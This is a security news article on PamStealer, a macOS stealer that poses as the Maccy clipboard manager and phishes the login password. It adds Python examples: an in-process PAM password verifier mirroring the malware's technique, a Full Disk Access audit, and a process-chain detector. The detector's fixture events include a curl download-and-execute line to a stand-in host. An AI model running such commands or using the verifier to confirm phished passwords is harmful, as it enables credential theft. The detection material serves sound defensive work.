Internet Voices

New macOS Malware PamStealer Exploits PAM to Steal Passwords

A new information stealer targeting macOS, "PamStealer," has been discovered. Written in Rust and delivered as a fake copy of the open-source clipboard manager Maccy, it phishes the user's login password with a look-alike dialog and checks it locally through the PAM API rather than by spawning dscl, security or osascript, which removes one of the process chains defenders usually watch for.

Reviewed & edited by the SINGULISM Editorial Team


A new information stealer targeting macOS, named "PamStealer," has been identified by researchers at the security company Jamf. It does not exploit a flaw in the Pluggable Authentication Modules (PAM) interface; it uses that interface, the same one macOS relies on for login, sudo and screen unlock, to verify the password it phishes from the victim. It is distributed as a disk image (DMG) posing as the legitimate open-source clipboard manager "Maccy."

As the report "Discovery of PamStealer, New Information-Stealing Malware Targeting macOS" notes, the sample is more careful about stealth and detection avoidance than earlier macOS stealers. Below we go through the technical details and what they mean for defenders.

Dual-Stage Delivery Method

PamStealer's infection process has two stages. The first is a disk image (DMG) masquerading as the legitimate macOS clipboard manager "Maccy." The image carries a compiled AppleScript applet whose main job is to download the second-stage payload and run it.

AppleScript is macOS's native automation language, widely used for system tasks and application control, and a compiled applet looks like any other app bundle to the user. The attackers use it to walk the victim through a plausible "installation" while the Rust-based second stage is fetched in the background. That second stage is the actual stealer. Being written in Rust, it ships its own runtime inside one large binary whose code patterns differ from the Objective-C, Swift and Go stealers analysts are used to, which slows reverse engineering and leaves signatures written for earlier families without a match.

Compared with traditional single-binary malware, the split is effective at getting past static analysis and file scanning. The small first stage contains little that looks suspicious, and the second stage only lands on disk after the user has already run the installer, so it never goes through the inspection applied to the original download.

Enhanced Stealth Through PAM Exploitation

The name "PamStealer" comes from its use of PAM (Pluggable Authentication Modules), the standard authentication framework macOS inherited from BSD (the implementation is OpenPAM, with per-service stacks under /etc/pam.d). PAM lets applications and system services such as login, sudo and the screen saver verify credentials through one consistent interface, and any process on the machine can call that interface.

The malware shows a native-looking password prompt reading, for example, "Maccy wants to make changes. Enter your password to allow this." The dialog is styled after the system authentication sheet, so users type their password into it; the malware then verifies that password locally through the PAM API.

According to Jamf's analysis, local verification through PAM departs from what traditional macOS stealers do: they shell out to commands such as dscl, security or osascript to validate a password, and every such call creates a child process whose command line a monitoring tool can see (a dscl -authonly invocation, for instance, puts the user name and the candidate password on the command line). Calling the PAM API directly leaves no new process behind. As Jamf explains, "This is a quieter routine that retains only verified passwords while eliminating one detectable process chain for defenders."
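To make the process-chain point concrete, here is an added example (not Jamf's code and not the malware's) that performs the same API sequence from Python with ctypes: pam_start, pam_authenticate with a conversation callback that answers the password prompt, then pam_end. The service name "login", the libc calls used for the response buffers, and the memory rule that libpam free()s the response array are assumptions that hold on macOS (OpenPAM) and Linux-PAM; nothing in it is taken from the sample.

```python
"""In-process password verification through libpam, driven with ctypes.
Added example for this article: neither Jamf's code nor the malware's, but
the API sequence the article attributes to PamStealer (pam_start ->
pam_authenticate -> pam_end with a conversation callback), so the
"no child process" claim can be observed directly.
Assumptions: a "login" PAM service exists, and libpam free()s the response
array, so it must come from malloc rather than Python-owned memory.
"""
import ctypes
import ctypes.util
import getpass
import sys

PAM_SUCCESS = 0
PAM_PROMPT_ECHO_OFF = 1   # hidden-input prompt, e.g. "Password:"
PAM_PROMPT_ECHO_ON = 2
PAM_ERROR_MSG = 3
PAM_TEXT_INFO = 4
CONV_FAILED = 1           # any non-zero return aborts the conversation


class PamMessage(ctypes.Structure):
    _fields_ = [("msg_style", ctypes.c_int), ("msg", ctypes.c_char_p)]


class PamResponse(ctypes.Structure):
    # resp is really char*; kept as void* so raw malloc'd memory (which
    # libpam will free) can be stored instead of Python-owned bytes.
    _fields_ = [("resp", ctypes.c_void_p), ("resp_retcode", ctypes.c_int)]


CONV_FUNC = ctypes.CFUNCTYPE(
    ctypes.c_int, ctypes.c_int,
    ctypes.POINTER(ctypes.POINTER(PamMessage)),
    ctypes.POINTER(ctypes.POINTER(PamResponse)),
    ctypes.c_void_p,
)


class PamConv(ctypes.Structure):
    _fields_ = [("conv", CONV_FUNC), ("appdata_ptr", ctypes.c_void_p)]


_libc = ctypes.CDLL(ctypes.util.find_library("c") or None)
_libc.calloc.restype = ctypes.c_void_p
_libc.calloc.argtypes = [ctypes.c_size_t, ctypes.c_size_t]
_libc.strdup.restype = ctypes.c_void_p
_libc.strdup.argtypes = [ctypes.c_char_p]
_libc.free.argtypes = [ctypes.c_void_p]


def make_conv(password: bytes):
    """Conversation callback: answer every prompt with `password`; leave
    PAM_ERROR_MSG / PAM_TEXT_INFO entries unanswered (resp stays NULL)."""
    def conv(n, msgs, resp_out, _appdata):
        arr = _libc.calloc(n, ctypes.sizeof(PamResponse))
        if not arr:
            return CONV_FAILED
        responses = ctypes.cast(arr, ctypes.POINTER(PamResponse))
        for i in range(n):
            if msgs[i].contents.msg_style in (PAM_PROMPT_ECHO_OFF, PAM_PROMPT_ECHO_ON):
                responses[i].resp = _libc.strdup(password)
        resp_out[0] = responses
        return PAM_SUCCESS
    return conv


def exercise_conv(password: bytes, styles):
    """Drive the callback the way libpam would, with constructed prompts.
    Returns (rc, answers) and frees what libpam would have freed."""
    messages = [PamMessage(style, b"Password:") for style in styles]
    ptrs = (ctypes.POINTER(PamMessage) * len(messages))(*map(ctypes.pointer, messages))
    out = ctypes.POINTER(PamResponse)()
    callback = CONV_FUNC(make_conv(password))
    rc = callback(len(messages), ptrs, ctypes.byref(out), None)
    answers = []
    for i in range(len(messages)):
        p = out[i].resp
        answers.append(ctypes.string_at(p) if p else None)
        if p:
            _libc.free(p)
    _libc.free(ctypes.cast(out, ctypes.c_void_p))
    return rc, answers


def pam_verify_password(user: str, password: str, service: str = "login"):
    """True if the stack accepts the password, False if it rejects it, None
    if libpam or the service is unusable.  Everything happens in-process."""
    path = ctypes.util.find_library("pam")
    if path is None:
        return None
    libpam = ctypes.CDLL(path)
    libpam.pam_start.restype = ctypes.c_int
    libpam.pam_start.argtypes = [ctypes.c_char_p, ctypes.c_char_p,
                                 ctypes.POINTER(PamConv), ctypes.POINTER(ctypes.c_void_p)]
    libpam.pam_authenticate.restype = ctypes.c_int
    libpam.pam_authenticate.argtypes = [ctypes.c_void_p, ctypes.c_int]
    libpam.pam_end.restype = ctypes.c_int
    libpam.pam_end.argtypes = [ctypes.c_void_p, ctypes.c_int]
    callback = CONV_FUNC(make_conv(password.encode()))   # must outlive the calls
    conv = PamConv(callback, None)
    handle = ctypes.c_void_p()
    if libpam.pam_start(service.encode(), user.encode(), ctypes.byref(conv),
                        ctypes.byref(handle)) != PAM_SUCCESS:
        return None
    rc = libpam.pam_authenticate(handle, 0)
    libpam.pam_end(handle, rc)
    return rc == PAM_SUCCESS


if __name__ == "__main__":
    who = sys.argv[1] if len(sys.argv) > 1 else getpass.getuser()
    verdict = pam_verify_password(who, getpass.getpass(f"Password for {who}: "))
    print({True: "accepted", False: "rejected", None: "libpam unavailable"}[verdict])
```

Run it with a user name and watch the process tree while you type the password: nothing is spawned. On macOS the login stack ends in pam_opendirectory, which asks opendirectoryd over IPC, so the only traces are that exchange and whatever opendirectoryd logs about it. On Linux the same script, run as a non-root user, makes pam_unix fork its setuid unix_chkpwd helper, which is exactly the kind of child process the macOS path does not produce.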

If verification fails, PamStealer shows the same prompt again until the correct password is entered, so it only ever keeps passwords it has confirmed. Once a password verifies, it displays a fake error message stating, "The file is corrupted and cannot be installed," presumably so the target attributes the failed "install" to a broken download rather than to malware.

Theft Targets and Disguising Techniques

Beyond the password, PamStealer uses several tactics to exfiltrate as much as it can. One is to prompt the target to grant Full Disk Access (a TCC permission under System Settings > Privacy & Security) to the fake Maccy app. If the target approves, the malware can read the whole file system: the login keychain database (which the password it just verified can unlock), saved browser passwords and cookie files, documents, and cryptocurrency wallet data.
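What such a grant looks like after the fact, and how to find it, as an added example (not from Jamf and not from the malware): TCC records Full Disk Access as service kTCCServiceSystemPolicyAllFiles in the system database /Library/Application Support/com.apple.TCC/TCC.db, which is itself readable only by a process that already has Full Disk Access (root alone is not enough). The column subset and the meaning of auth_value 2 as "allowed" are assumptions matching current macOS releases, and the fixture database is constructed so the audit runs anywhere.

```python
"""Audit Full Disk Access grants in a TCC database.

Added example for this article, not Jamf's tooling and not the malware's
code.  The `access` table columns used here are a subset of the real
schema and auth_value == 2 meaning "allowed" is an assumption that matches
current macOS releases.  build_fixture_db() constructs a stand-in so the
audit can be exercised without a Mac.
"""
import os
import pathlib
import sqlite3
import sys
import tempfile

SYSTEM_TCC_DB = "/Library/Application Support/com.apple.TCC/TCC.db"
FDA_SERVICE = "kTCCServiceSystemPolicyAllFiles"
AUTH_ALLOWED = 2
CLIENT_TYPE = {0: "bundle id", 1: "path"}
# Nothing legitimate is granted FDA while running from one of these places;
# an installer that asked from here is the pattern described in the article.
TRANSIENT_PREFIXES = ("/Volumes/", "/tmp/", "/private/tmp/", "/Users/Shared/")


def fda_grants(db_path):
    """(client, client type, auth_value) for every currently allowed FDA row,
    oldest grant first.  Opens the database read-only."""
    uri = pathlib.Path(db_path).resolve().as_uri() + "?mode=ro"
    db = sqlite3.connect(uri, uri=True)
    try:
        rows = db.execute(
            "SELECT client, client_type, auth_value FROM access "
            "WHERE service = ? AND auth_value = ? ORDER BY last_modified",
            (FDA_SERVICE, AUTH_ALLOWED),
        ).fetchall()
    finally:
        db.close()
    return [(c, CLIENT_TYPE.get(t, str(t)), v) for c, t, v in rows]


def suspicious_fda_grants(db_path, allowlist=()):
    """FDA holders outside the allowlist, each with the reason it was flagged."""
    flagged = []
    for client, ctype, _ in fda_grants(db_path):
        if client in allowlist:
            continue
        if ctype == "path" and client.startswith(TRANSIENT_PREFIXES):
            flagged.append((client, "FDA granted to a binary in a transient location"))
        else:
            flagged.append((client, "FDA holder not on the approved list"))
    return flagged


def build_fixture_db(path):
    """Constructed stand-in for TCC.db with only the columns the audit reads."""
    db = sqlite3.connect(path)
    with db:
        db.execute("CREATE TABLE access (service TEXT, client TEXT, client_type INTEGER, "
                   "auth_value INTEGER, auth_reason INTEGER, last_modified INTEGER)")
        db.executemany("INSERT INTO access VALUES (?, ?, ?, ?, ?, ?)", [
            (FDA_SERVICE, "com.apple.Terminal", 0, AUTH_ALLOWED, 2, 1700000000),
            (FDA_SERVICE, "com.example.backup-agent", 0, AUTH_ALLOWED, 2, 1700000100),
            # the fake Maccy: an app the user ran straight from the mounted image
            (FDA_SERVICE, "/Volumes/Maccy/Maccy.app/Contents/MacOS/Maccy", 1, AUTH_ALLOWED, 2, 1700000200),
            # a denied request and a different service must not be reported
            (FDA_SERVICE, "com.example.clipper", 0, 0, 2, 1700000300),
            ("kTCCServiceAccessibility", "com.example.clipper", 0, AUTH_ALLOWED, 2, 1700000400),
        ])
    db.close()


def demo(allowlist=("com.apple.Terminal", "com.example.backup-agent")):
    """Run the audit against the constructed fixture and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "TCC.db")
        build_fixture_db(path)
        return suspicious_fda_grants(path, allowlist)


if __name__ == "__main__":
    db_path = sys.argv[1] if len(sys.argv) > 1 else SYSTEM_TCC_DB
    for client, reason in suspicious_fda_grants(db_path):
        print(f"{reason}: {client}")
```

Against a real machine, run it with sudo from a terminal that itself has Full Disk Access and pass your fleet's approved bundle identifiers as the allowlist; a clipboard manager has no business on that list at all. A grant can be revoked with `sudo tccutil reset SystemPolicyAllFiles <bundle id>`.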

The malware has also been confirmed to contain code for accessing Ethereum accounts. Going after private keys and seed phrases for cryptocurrency wallets fits a trend seen in macOS-targeting malware over recent years.

Security Implications

PamStealer's methods show where macOS security monitoring is thin. Password verification through a direct PAM call is not among the patterns traditional endpoint products look for: most of them key on process creation, file writes and network traffic, and an authentication request arriving at the PAM stack looks like ordinary system activity regardless of which process made it.

The AppleScript first stage leans on another macOS-specific blind spot: AppleScript is so common in automation and management that security tools rarely treat it as malicious on its own. Delivery as a DMG, on the other hand, does not by itself bypass Gatekeeper. A quarantined applet inside a mounted image is still checked, so unless the attacker obtained notarization the user has to override the Gatekeeper warning, a step fake-installer campaigns routinely talk the victim through with on-screen "installation instructions."
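The process chains discussed under "Enhanced Stealth Through PAM Exploitation" and the monitoring gaps above can be checked against sample telemetry. What follows is an added example, not Jamf's detection content and not anything from the sample: the exec events are constructed, and the ExecEvent fields (pid, ppid, path, args) are an assumption standing in for whatever an EDR or Endpoint Security client actually records. It flags the first-stage applet spawning a shell and curl from a mounted image, and the dscl -authonly, security unlock-keychain and osascript hidden-answer patterns older stealers use to validate a password. A PAM-based check produces no event for that second rule, which is the gap the text describes.

```python
"""Process-chain rules for the two observable stages of a DMG-delivered stealer.

Added example for this article, not Jamf's detection logic.  The events below
are constructed and the ExecEvent fields are an assumption standing in for a
real EDR / Endpoint Security exec event.
"""
from __future__ import annotations

import os
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ExecEvent:
    pid: int
    ppid: int
    path: str              # executable of the new process
    args: tuple[str, ...]  # its argv


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    chain: str             # ancestor -> ... -> child basenames, for the analyst


SHELLS_AND_DOWNLOADERS = {"sh", "bash", "zsh", "curl", "wget"}
DIALOG_RE = re.compile(r"display dialog .*hidden answer")


def ancestry(ev: ExecEvent, by_pid: dict[int, ExecEvent]) -> list[ExecEvent]:
    """Parent, grandparent, ... as far as the event table reaches."""
    chain, seen, cur = [], set(), by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        chain.append(cur)
        seen.add(cur.pid)
        cur = by_pid.get(cur.ppid)
    return chain


def cli_password_check(ev: ExecEvent) -> str | None:
    """The child processes older stealers leave behind when validating a password."""
    name = os.path.basename(ev.path)
    if name == "dscl" and "-authonly" in ev.args:
        return "dscl -authonly password validation"
    if name == "security" and "unlock-keychain" in ev.args:
        return "security unlock-keychain password validation"
    if name == "osascript" and DIALOG_RE.search(" ".join(ev.args)):
        return "osascript password dialog with hidden answer"
    return None


def stager_activity(ev: ExecEvent, parents: list[ExecEvent]) -> str | None:
    """Shell or downloader launched beneath a mounted DMG or an AppleScript runner."""
    if os.path.basename(ev.path) not in SHELLS_AND_DOWNLOADERS:
        return None
    for p in parents:
        if p.path.startswith("/Volumes/"):
            return "shell/downloader under app running from mounted DMG"
        if os.path.basename(p.path) in ("osascript", "applet"):
            return "shell/downloader under AppleScript"
    return None


def detect(events: list[ExecEvent]) -> list[Finding]:
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        parents = ancestry(ev, by_pid)
        names = [os.path.basename(p.path) for p in reversed(parents)] + [os.path.basename(ev.path)]
        chain = " -> ".join(names)
        for rule in (cli_password_check(ev), stager_activity(ev, parents)):
            if rule:
                findings.append(Finding(ev.pid, rule, chain))
    return findings


# Constructed sample: the fake-Maccy applet on a mounted image pulls stage two,
# which daemonises and re-parents to launchd (ppid 1).  Event 504 is what an
# OLDER stealer would add; a PAM-based check leaves no such line at all.
SAMPLE_EVENTS = [
    ExecEvent(500, 1, "/Volumes/Maccy/Maccy.app/Contents/MacOS/applet", ("applet",)),
    ExecEvent(501, 500, "/bin/sh", ("sh", "-c",
              "curl -fsSL https://stage2.invalid/m -o /tmp/.m && chmod +x /tmp/.m && /tmp/.m")),
    ExecEvent(502, 501, "/usr/bin/curl", ("curl", "-fsSL", "https://stage2.invalid/m", "-o", "/tmp/.m")),
    ExecEvent(503, 1, "/tmp/.m", ("/tmp/.m",)),
    ExecEvent(504, 503, "/usr/bin/dscl", ("dscl", ".", "-authonly", "alice", "hunter2")),
    # benign noise that must not fire
    ExecEvent(600, 1, "/usr/bin/dscl", ("dscl", ".", "-read", "/Users/alice", "UniqueID")),
    ExecEvent(601, 1, "/bin/zsh", ("-zsh",)),
    ExecEvent(602, 601, "/usr/bin/curl", ("curl", "-O", "https://example.invalid/notes.txt")),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"pid {f.pid}: {f.rule}  [{f.chain}]")
```

Two things are worth noticing in the sample. Once the second stage has re-parented to launchd (pid 503), its ancestry back to the DMG is gone, so whatever it does has to be caught on its own merits. And with PAM in the picture, the password check is one of the things that no longer appears: rule 504 fires only for the older shell-out style, so the remaining signals are the stage-one chain, the unsigned binary in /tmp, and the authentication dialog that binary presents.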

How widespread the malware is remains unclear, but its technical sophistication underscores how macOS threats are evolving. Security teams are advised to extend macOS endpoint monitoring beyond file-based detection: look for unsigned or ad-hoc signed binaries launched from mounted images or temporary paths, shells and downloaders spawned by AppleScript applets, authentication dialogs presented by such processes, and the authentication requests the PAM stack forwards to opendirectoryd on their behalf.

As noted in "Microsoft Defender's Privilege Escalation Vulnerability 'RoguePlanet' Released," attacks that abuse standard OS functionality and APIs are on the rise. Countering them means moving from known-malware signatures alone to behavioral detection and monitoring of suspicious API use.

Editorial Opinion

The discovery of PamStealer highlights the growing security challenges macOS faces as it confronts a new wave of threats. In the short term, we might see Apple change the PAM API or AppleScript, or security vendors such as Jamf add dedicated rules around PAM use. Meanwhile, macOS users should be wary of installers disguised as legitimate apps and heed warnings from security advisories.

From a long-term perspective, as macOS continues to expand its user base among both individuals and enterprises, its attack surface as a platform grows with it. Techniques like PamStealer's direct use of macOS's standard authentication infrastructure are hard for traditional antivirus solutions to detect and could accelerate the shift to endpoint protection based on dynamic analysis and behavioral monitoring. The increasing prevalence of Rust-based malware is likely to complicate analysis and response further.

Our editorial team is closely monitoring whether PamStealer will become a widespread threat or remain confined to targeted attacks.

Frequently Asked Questions

How does PamStealer infect macOS?
It is distributed as a disk image (DMG) disguised as the legitimate clipboard manager "Maccy." When the user mounts the image and runs the app inside it, the first-stage AppleScript applet downloads and executes the Rust-based second stage.
What are the advantages of exploiting PAM?
Traditional malware typically invokes external commands (such as dscl or osascript) for password verification, which generates process chains that are easier for security tools to detect. By directly using the PAM API, PamStealer avoids leaving traces of process generation, making it harder for security products to identify.
How can users protect themselves against PamStealer?
Avoid installing applications from untrusted sources, and download software only from the developer's official site or the App Store. Treat any installer that asks for your password or for Full Disk Access with suspicion: a clipboard manager has no reason to need Full Disk Access. Deny suspicious password prompts immediately, and make sure endpoint protection on the machine includes behavioral detection.
Source: Slashdot
